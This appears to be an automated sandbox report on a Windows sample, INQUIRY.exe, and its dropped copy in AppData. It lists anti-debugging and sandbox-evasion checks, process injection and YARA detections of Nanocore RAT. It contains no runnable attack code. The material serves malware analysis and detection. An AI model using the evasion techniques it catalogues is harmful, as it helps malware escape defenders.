Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\INQUIRY.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-4078

Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4728	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 6512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 5156	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 5992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 2440	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 3136	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 6656	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Window / User API: threadDelayed 384			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY.exe	Window / User API: foregroundWindowGot 965			Jump to behavior

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

API coverage: 9.8 %

Source: C:\Users\user\Desktop\INQUIRY.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00405D7C FindFirstFileA,FindClose,	1_2_00405D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004053AA
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_00404A29 FindFirstFileExW,	4_2_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_00404A29 FindFirstFileExW,	4_1_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00405D7C FindFirstFileA,FindClose,	5_2_00405D7C
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004053AA
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00402630 FindFirstFileA,	5_2_00402630
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00404A29 FindFirstFileExW,	6_2_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_00404A29 FindFirstFileExW,	6_1_00404A29

Source: C:\Users\user\Desktop\INQUIRY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	API call chain: ExitProcess graph end node	graph_1-3738
Source: C:\Users\user\Desktop\INQUIRY.exe	API call chain: ExitProcess graph end node	graph_1-3737
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	API call chain: ExitProcess graph end node	graph_4-9918
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	API call chain: ExitProcess graph end node	graph_5-3238
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	API call chain: ExitProcess graph end node	graph_5-3234
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	API call chain: ExitProcess graph end node	graph_6-11141

Source: INQUIRY.exe, 00000002.00000003.878664551.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.774619446.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825484373.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.891624321.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.733579764.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.759637821.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.683832715.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.878647519.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.670540587.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.786041516.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825616062.0000000000815000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.865016296.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.705623191.000000000080B000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Code function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0040446F

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405DA3

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Code function: 4_2_004067FE GetProcessHeap,

4_2_004067FE

Source: C:\Users\user\Desktop\INQUIRY.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A0402 mov eax, dword ptr fs:[00000030h]	1_2_021A0402
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A0616 mov eax, dword ptr fs:[00000030h]	1_2_021A0616
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A0706 mov eax, dword ptr fs:[00000030h]	1_2_021A0706
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A0744 mov eax, dword ptr fs:[00000030h]	1_2_021A0744
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A06C7 mov eax, dword ptr fs:[00000030h]	1_2_021A06C7
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_004035F1 mov eax, dword ptr fs:[00000030h]	4_2_004035F1
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_004035F1 mov eax, dword ptr fs:[00000030h]	4_1_004035F1
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_004035F1 mov eax, dword ptr fs:[00000030h]	6_2_004035F1
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_004035F1 mov eax, dword ptr fs:[00000030h]	6_1_004035F1

Source: C:\Users\user\Desktop\INQUIRY.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_00401E1D SetUnhandledExceptionFilter,	4_2_00401E1D
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0040446F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00401C88
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00401F30
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_00401E1D SetUnhandledExceptionFilter,	4_1_00401E1D
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_1_0040446F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_1_00401C88
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_1_00401F30
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00401E1D SetUnhandledExceptionFilter,	6_2_00401E1D
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0040446F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00401C88
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00401F30
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_00401E1D SetUnhandledExceptionFilter,	6_1_00401E1D
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_1_0040446F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_1_00401C88
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_1_00401F30

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\INQUIRY.exe

Memory written: C:\Users\user\Desktop\INQUIRY.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY.exe	Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Process created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"	Jump to behavior

Source: INQUIRY.exe, 00000002.00000002.917971257.00000000007D9000.00000004.00000020.sdmp	Binary or memory string: X"~Program Manager$
Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.917971257.00000000007D9000.00000004.00000020.sdmp, INQUIRY.exe, 00000002.00000002.918737998.0000000002B9A000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmp, INQUIRY.exe, 00000002.00000002.918753295.0000000002BB6000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918570208.00000000029AC000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918544054.000000000299F000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918712708.0000000002B8A000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918560831.00000000029A7000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: INQUIRY.exe, 00000002.00000003.825484373.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.733579764.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.759637821.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.683832715.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.670540587.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825616062.0000000000815000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.865016296.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.705623191.000000000080B000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.812351194.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.838969103.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.838991506.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.856693810.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.697406169.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825517657.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.718632163.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.747066430.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.710595291.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.692336980.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.799544616.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.692368806.0000000000815000.00000004.00000001.sdmp	Binary or memory string: Program Managert$
Source: INQUIRY.exe, 00000002.00000002.918518466.0000000002965000.00000004.00000001.sdmp	Binary or memory string: Program Managerr
Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918570208.00000000029AC000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmp	Binary or memory string: Program ManagerPG

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Code function: 4_2_0040208D cpuid

4_2_0040208D

Source: C:\Users\user\Desktop\INQUIRY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe

Code function: 4_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00401B74

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

1_2_00405AA7

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
